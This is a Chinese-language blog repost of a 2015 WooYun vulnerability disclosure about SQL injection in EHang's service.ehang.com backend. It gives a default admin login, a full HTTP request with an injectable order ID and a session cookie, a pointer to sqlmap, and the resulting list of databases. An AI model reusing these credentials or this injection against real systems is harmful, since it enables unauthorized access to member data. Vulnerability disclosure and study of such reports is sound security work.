记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

亿航某后台SQL注入影响主站会员信息

2015-08-12 00:05

http://service.ehang.com 进入后台 admin 123456

LO%JQNS_03{0}DX7360M{$X.png





code 区域
GET /index.php/order/editorder/id/168* HTTP/1.1

Host: service.ehang.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

DontTrackMeHere: gzip, deflate

Referer: http://service.ehang.com/index.php/order/index/pstatus/1

Cookie: Hm_lvt_24dbb2c1f440b93f007bcd465512ea1a=1435298533; Hm_lpvt_24dbb2c1f440b93f007bcd465512ea1a=1435298533; PHPSESSID=l03ala7556td23f8d63jjthdt5

X-Forwarded-For:

Connection: keep-alive



ID问题 丢入sqlmap 跑

FS%MMD5WO%CU[`EED)0FV`V.jpg

漏洞证明:

code 区域
[*] bbs_ehang

[*] ehang2015

[*] ehang_crm

[*] ehangen

[*] ehangja

[*] enbbs

[*] information_schema

[*] mybb

[*] mysql

[*] performance_schema

[*] test

[*] zentao





影响到主站bbs 英文站点bbs等

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0122908

阅读:95284 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“亿航某后台SQL注入影响主站会员信息”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云